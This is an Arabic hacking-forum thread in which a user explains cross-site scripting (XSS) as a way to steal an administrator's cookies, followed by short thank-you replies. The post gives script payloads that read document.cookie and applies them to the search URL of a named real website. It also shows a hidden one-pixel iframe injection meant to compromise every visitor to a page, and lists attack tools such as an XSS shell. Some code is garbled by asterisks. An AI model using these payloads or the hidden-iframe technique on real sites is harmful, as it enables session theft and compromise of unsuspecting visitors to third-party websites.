اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

  1. #1
    هكر مبتديء Array الصورة الرمزية aymandz
    تاريخ التسجيل
    Jan 2013
    الدولة
    world
    المشاركات
    37

    aljyyosh تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها



    تعريفها
    و هى ثغرة من خلالها يمكنك سحب الكوكيز الخاص بالادمن
    ثغرة [ XSS ] هي اختصار لـ[ Cross site scripting ] وسبب عدم كتابتها بالاختصار الصحيح [ CSS ] لكي لا يحدث خلط مع لغة الـ[ CSS ] الانماط القياسية المعروفة [ Cascading Style Sheets ] , وبذلك تم تسميتها [ XSS ]
    ثغرات [ XSS ] لها نوعين وهما
    1 ثغرات XSS ثابته - مخزّنه [ Persistent - stored ]
    2 ثغرات XSS غير ثابته - غير مخزّنه [ Non persistent - Reflecte

    ثغرات XSS الثابته هي اخطر من النوع الغير ثابت , وذلك لان ثغرات XSS الثابته , مايدخله الزائر ثابت بالصفحه , اي مايدخله مثلاً يخزّن بقاعدة بيانات السكربت
    ثغرات الغير ثابته , هي النوع الاكثر انتشاراً وليس خطورة وهي التي تقوم على اساس الادخال الخاص مثلاً , كما ذكرنا سابقاً عند البحث في المنتديات هنا الحالة تسمى غير ثابته

    الكود المهم في ثغرات xss
    كود:
    **********alert(**************)</script>**********alert("XSS")</script>
    هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات
    هذا السكربت و ظيفته هي سرقة الكوكيز و هذا الكوكيز
    يحتوي على اليوزر نايم و الباسوورد المشفرmd5
    مثلا ناخذ هذا الموقع
    كود HTML:
    https://www.calacademy.org
    وريح يكون استغلال مثلا بشكل هذا
    كود HTML:
     https://www.calacademy.org/search.php?q=
    الكود هذا نحطو في اخير بعد العلامة (=)
    نحط هذا الكود وانت يمكن تغير ما بينا قوسين الملف المصاب
    كود:
    **********alert(document.cookie)</script>**********alert("XSS")</script>
    المهم يصبح هيك
    كود HTML:
    https://www.calacademy.org/search.php?q=%3Cscript%3Ealert%28document.cookie%2 9%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
    هناك العديد من الطرق , وجميعها تعتبر من الطرق البرمجية ( اي حقن اكواد برمجية ) , لذلك كل ما زادت خلفية المخترق في البرمجة كل ما تمكن من التعامل مع هذه الثغرات باحترافية اكثر .
    1 – تلغيم الصفحة .
    وهنا سيتم حقن اكواد HTML لاضافة صفحة خفية ملغومة في داخل الموقع ( الصفحة ) المصاب
    كود:
    <html>
     <iframe name=”I1″ src=”https://www.calacademy.org/server.html” marginwidth=”1″ marginheight=”1″ height=”1″ width=”1″ scrolling=”no” border=”0″ frameborder=”0″>
     </iframe>
     </iframe></p>
     </html>
    عندها سيتم فتح هذا الموقع بطريقة خفية , وسيتم اختراق كل من دخل للصفحة التي تم حقن الكود فيها .
    الادوات :
    شل g.h.t.xssshell
    استضافة تدعم asp
    برنامج ftp FileZilla_3.7.3_win32-setup.exe Show file details (recommended)
    موقع للتلغيم (كل شغص يختار اي موقع للتلغيم )
    برنامج الختراق
    وهذا الفيديو يشرح لكم طريقة استغلال الثغرة
    وفي الاخير اتمنى ان اكون قد اوصلت لكم المعلومات الكافية
    وارجو من الله تعالى ان يوفقني ويوفقكم فيما يحبه ويرضاه والسلام عليكم
    لاتنسونا بتققيم الموضوع

    - - - تم التحديث - - -

    التعديل الأخير تم بواسطة aymandz ; 01-24-2014 الساعة 08:26 PM


  2. #2
    هكر متميز Array
    تاريخ التسجيل
    Jun 2011
    المشاركات
    1,060

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك ننتظر منك المزيد صديقي مشكور للشرح


  3. #3
    :: مراقب عام :: Array الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك على الموضوع ... بالتوفيق



  4. #4
    هكر مبتديء Array الصورة الرمزية aymandz
    تاريخ التسجيل
    Jan 2013
    الدولة
    world
    المشاركات
    37

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    وفيكم بركة


  5. #5
    هكر متميز Array الصورة الرمزية dark prince
    تاريخ التسجيل
    Jul 2010
    الدولة
    IN DARKNESS
    المشاركات
    1,608

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك شرح واضح و مفيد
    واصل تقدمك في انتظار جديدك


  6. #6
    هكر مجتهد Array الصورة الرمزية commanderegy
    تاريخ التسجيل
    Dec 2013
    المشاركات
    232

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    جزاك الله خيرا



  7. #7
    هكر مبتديء Array الصورة الرمزية the punisher
    تاريخ التسجيل
    Dec 2013
    الدولة
    الدولة الإسلامية - ولاية سيناء
    المشاركات
    25

    Hasri رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    مشكور عالمجهود الرائع اخي بارك الله فيك


  8. #8
    هكر مجتهد Array الصورة الرمزية b!àz!k
    تاريخ التسجيل
    Nov 2012
    الدولة
    سؤال محرج
    المشاركات
    499

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك


  9. #9
    هكر مجتهد Array الصورة الرمزية sohayl111
    تاريخ التسجيل
    Jun 2012
    الدولة
    المغرب
    المشاركات
    451

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2012
    المشاركات
    41

    افتراضي رد: تعرف على ثغرة xss وكل ما يتعلق بها وبرامجها

    بارك الله فيك


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. استفسار بسيط للخبراء في مجال الحماية وبرامجها
    بواسطة HaCkeR Gold في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 10
    آخر مشاركة: 11-08-2012, 02:29 AM
  2. استفسار بسيط للخبراء في مجال الحماية وبرامجها
    بواسطة HaCkeR Gold في المنتدى منتدى حماية الأجهزة
    مشاركات: 3
    آخر مشاركة: 11-05-2012, 01:02 AM
  3. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  4. ممكن كم برنامج يتعلق بالتشفير...
    بواسطة ذكريات هكر في المنتدى منتدى برامج وأدوات الهكرز
    مشاركات: 6
    آخر مشاركة: 11-25-2011, 07:03 PM
  5. شرح كامل 100% وكل ما يتعلق بال ( Dos ) الدوس
    بواسطة غروك وغيروك في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 3
    آخر مشاركة: 09-25-2011, 12:09 AM

وجد الزوار هذه الصفحة بالبحث عن:

xss شرح ثغرة

xss ثغرة

ثغرة xss

كيفية سحب الكوكيز

معرفة هل الموقع مصاب ب xss

موقع سحب الكوكيز

ما هو اختصار في الثغرات XSS

كيف تعرف ان الموقع مصاب بثغرة xss

تعريف ثغرة xss وكيفية عملها

كيفية معرفة الملفات المصابة بثغرة xss 2016 في أي موقع

http:www.aljyyosh.comvbshowthread.phpt=51761

استغلال ثغرة xss

شرح ثغرة Cross Site Scripting

سحب الكوكيز xss

سكربت خبيث

شرح ثغرة xss

ثغرة اكسس

ما هي ثغرة xss site:www.aljyyosh.com

ثغرات بريد الكتروني

كيفيه سحب الكوكيز للفيس

شرح cross site scripting

تعريف xss واخطارها

اداة لل xss

دورة ثغرة xss

https:www.calacademy.orgsearch.phpq

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •